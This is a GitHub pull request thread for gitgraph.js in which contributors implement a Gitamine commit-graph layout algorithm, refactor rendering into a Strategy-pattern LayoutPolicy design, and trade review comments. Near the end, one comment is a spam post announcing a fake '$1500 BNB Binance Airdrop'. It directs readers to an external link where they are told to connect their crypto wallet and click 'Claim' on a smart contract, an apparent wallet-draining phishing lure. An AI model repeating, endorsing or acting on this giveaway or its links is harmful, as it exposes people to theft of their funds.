Implement GitamineRendering's computePositions

pvigier opened the pull request:
Hi,

Do not merge now, this is work in progress.

This is a first version of the algorithm. It seems to work well on the example in the storybook.

I mindlessly adapted the code. There is some points I need to check after having refreshed my mind on how the algorithm works. I also must modify some bits of code to please the linter. If you have any suggestion concerning the code, feel free! I am not an expert at all of TypeScript.

If you can set up more examples, it would help greatly to check the robustness of the implementation.

Moreover, is there a better way of testing the code than running `npm run build` followed by `npm run storybook` each time I modify the code? I am not familiar with this environment.

Best,
Pierre

pvigier committed:
Implement GitamineRendering's computePositions

pvigier committed:
Remove the unnecessary 'index' branch

pvigier committed:
Fix an error in the original algorithm

pvigier committed:
Fix linting issues

pvigier committed:
Minor improvements in GitamineRendering

pvigier commented:
I just realized that the rows are reversed (from top to bottom instead of bottom to top). I think the simpler way to solve that is to reverse at the end of the algorithm.

Can I suggest to separate the algorithm from the output? Currently,  `DefaultRendering` is at the same time: a base class for rendering algorithms, a rendering algorithm and the output of the `ComputeLayout` method.

https://github.com/marekyggdrasil/gitgraph.js/blob/e6f2ba11b18d0f7e0ddc83f88acbdf996fc7c40c/packages/gitgraph-core/src/gitgraph.ts#L439-L441

I suggest to:
* Rename the current `Layout` enum to `LayoutType`.
* Create a class `Layout` that contains the member variables of `DefaultRendering` and the method that are useful to interact with them. This type will be returned by `ComputeLayout`.
* Create an interface `RenderingStrategy` (or `RenderingPolicy` or `RenderingAlgorithm` whichever you prefer) that will be implemented by all the rendering algorithms.

The enum might even not be necessary anymore. Users could directly pass a rendering algorithm. That would allow configurable rendering algorithms or even enable users to create their custom rendering algorithms without modifying the library.

This way, it will be clear that we use the [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern). And as the strategy object will not outlive the layout computation, we will be able to use member variables to store intermediate results which will allow cleaner implementations.

I see that there is another rendering class `CompactRendering`. What should it do?

marekyggdrasil commented:
Hi @pvigier ! Those are really excellent suggestions. I was also thinking about really well separating the algorithm from the output, and what you received is my best effort for it, but I would be happy to help you out with this, but I think we would need to discuss a bit details how to do it.

I agree with you on all the three points you suggested, if you need help with any of those (or later) just let me know when its good to merge and we can share some tasks if you like, if you prefer to handle it alone that is also ok.

A suggestion I was thinking about was implementing a repo object, [in Gitamine you do have it](https://github.com/pvigier/gitamine/blob/master/src/renderer/helpers/repo-wrapper.ts#L54-L75), but in gitgraph.js we just handle lists of commits which is sufficient for very simple rendering algorithms, but once we want to go beyond that we need to do operations like finding childrens which are merge commits etc and it would be beneficial to abstract it out. I realized it while studying your Gitamine repository. Let's not worry about it for now, it is not really essential at this stage, just sharing an idea.

The strategy pattern really seem like right choice of a tool here and letting user provide their own rendering algorithm by, for example, preparing a callback function and passing it as an argument could potentially extend the use of gitgraph.js beyond rendering gitgraphs. The thing I am concerned and not sure about is, the strategy would be a type, defined by a specific class, but what about users who use pure js without TypeScript, without ES6 etc, just the regular browser programmers, would they still be able to implement rendering that works with the strategy we define? 

Regarding the `CompactRendering` it needs to be somewhere somehow included for backwards compatibility as gitgraph.js has a feature of rendering commit messages as tooltips, you can try it out [here](https://gitgraphjs.com/#15). I am really not sure if it should be a separate rendering algorithm, because clearly the way nodes are positions is the same, difference is how messages are placed.

One more thing, we can totally discuss here, we already exchange some e-mails, but if you want to just exchange quick messages there is also dedicated [gitter channel](https://gitter.im/gitgraphjs/community) for gitgraph.js project, feel free to use any channel of communication up to your own preference.

pvigier committed:
Rename Layout to LayoutType

pvigier committed:
Add Layout to separate the output of rendering algorithms

pvigier committed:
Add LayoutPolicy as common base class of rendering algorithms

pvigier commented:
OK, I renamed `Layout` to `LayoutType` and split `DefaultRendering` in `Layout`, `LayoutPolicy` and `DefaultRendering`.

To clarify the naming convention, I suggest to rename the layout algorithms with the suffix "Layout" or "LayoutPolicy" (e.g. "DefaultLayout" or "DefaultLayoutPolicy"). Let me know which one you prefer.

The next step to fully embrace the Strategy Pattern is to get rid of `LayoutType` and directly give an instance of a layout policy as parameter of `GitGraphCore`. We would use the library like this:

```typescript
const core = new GitgraphCore({layout: GitamineRendering()});
```

This way, we can make configurable layout algorithms:

```typescript
const core = new GitgraphCore({layout: GitamineRendering(parameters)});
```

Or even user custom layout algorithms:

```typescript
const core = new GitgraphCore({layout: CustomRendering()});
```

If you agree with this, let me know, I will start working on that.

> The thing I am concerned and not sure about is, the strategy would be a type, defined by a specific class, but what about users who use pure js without TypeScript, without ES6 etc, just the regular browser programmers, would they still be able to implement rendering that works with the strategy we define?

I have no idea, I never made a JavaScript library before. We need to investigate this point, and maybe ask Nicolas.

> A suggestion I was thinking about was implementing a repo object, in Gitamine you do have it, but in gitgraph.js we just handle lists of commits which is sufficient for very simple rendering algorithms, but once we want to go beyond that we need to do operations like finding childrens which are merge commits etc and it would be beneficial to abstract it out. I realized it while studying your Gitamine repository. Let's not worry about it for now, it is not really essential at this stage, just sharing an idea.

Yes, I think we will tackle this issue when there will be code duplication between several layout algorithms.

Concerning the examples to further test the gitamine layout algorithm, is there a way to easily import a commit graph from a real project? I have several interesting examples, I used during the development of gitamine.

pvigier committed:
LayoutPolicy is not a generic class anymore

pvigier committed:
Use directly LayoutPolicy in GitGraphCore

pvigier committed:
Remove useless LayoutType

pvigier committed:
Rename layout policies

pvigier committed:
Rename layout to policy and renderedLayout to layout in GitGraphCore

pvigier committed:
Compute the layout only once in GitGraphCore

pvigier commented:
Finally, I used the suffix "Policy" but we can still change! I also renamed few other things in `GitGraphCore`.

I slightly modified `GitGraphCore` to compute the layout only once. Let me know, if there is an issue.

The next steps are polishing the implementation of `GitaminePolicy`, and test it on few examples (and maybe I will implement another layout policy).

Then, if everything is OK, we will merge this branch in your branch and start polishing the feature (documentation, tests, see if we can make things cleaner, etc.).

marekyggdrasil commented:
I made a brief review and it looks really good to me. Any ideas for different layout policies that could be implemented? Let me know if there is anything you need from me, I'll be happy to help out / contribute.

pvigier commented:
I was thinking of a policy with curved branches à la "Git Extensions". If I implement it, I may rename `GitaminePolicy` to `StraightBranchesPolicy` to clearly state the difference between the two policies.

> Let me know if there is anything you need from me, I'll be happy to help out / contribute.

There is still the open issue about testing the algorithms:
> Concerning the examples to further test the gitamine layout algorithm, is there a way to easily import a commit graph from a real project?
If not, we could write a tool to import a real git repo for use with gitgraph.js (maybe with NodeGit).

There is also the issue of creating custom layout policies using pure JavaScript.

marekyggdrasil commented:
Ok, regarding the tests don't worry about them, I'll write some tests. I propose following testing approach: pre-compute some rendered layouts (just positions) and add tests that will run the rendering and compare them. Let me know if you have some better idea.

And for pure JavaScript, at this stage I really don't have an idea, so I propose to provide feature of customized rendering for node.js / TypeScript only and pure JavaScript users would still have an option to use one of pre-compiled policies. In the future it could be extended, but at this stage it feels like beyond the scope. If you have any comments, let me know.

There have been some changes to the upstream since you started but don't worry about merging, I'll handle that, just focus on your ideas 😎

pvigier commented:
Hi Marek,

I am sorry, I was and still am very busy, I don't think I will be able to polish this PR before the next month.

Best,
Pierre

andreasonny83 commented on packages/gitgraph-core/src/layout-policies/gitamine.ts:
```diff
@@ -0,0 +1,155 @@
+
+import FastPriorityQueue = require("fastpriorityqueue");
+
+export { GitaminePolicy };
+
+class GitaminePolicy extends LayoutPolicy {
```
just `export class GitaminePolicy extends LayoutPolicy...`

andreasonny83 commented on packages/gitgraph-core/src/layout-policy.ts:
```diff
@@ -0,0 +1,27 @@
+import { Commit } from "./commit";
+import { Color, Layout } from "./layout"
+
+export { LayoutPolicy };
+
+abstract class LayoutPolicy {
```
`export abstract class LayoutPolicy {`

andreasonny83 commented on packages/gitgraph-core/src/layout.ts:
```diff
@@ -1,4 +1,67 @@
+
+type Color = string;
+
+class Layout {
```
`export class Layout`

andreasonny83 commented on packages/gitgraph-core/src/layout.ts:
```diff
@@ -1,4 +1,67 @@
+
+export { Color, Layout };
+
+type Color = string;
```
`export type Color = string`

marekyggdrasil commented:
@pvigier please also pull from upstream as instructed in https://github.com/nicoespeon/gitgraph.js/pull/364#issuecomment-706899199 just to not get too far from the source repository and to avoid Travis CI build errors.

arconejeros commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

isakbm commented:
Is this issue still open, i.e not solved?
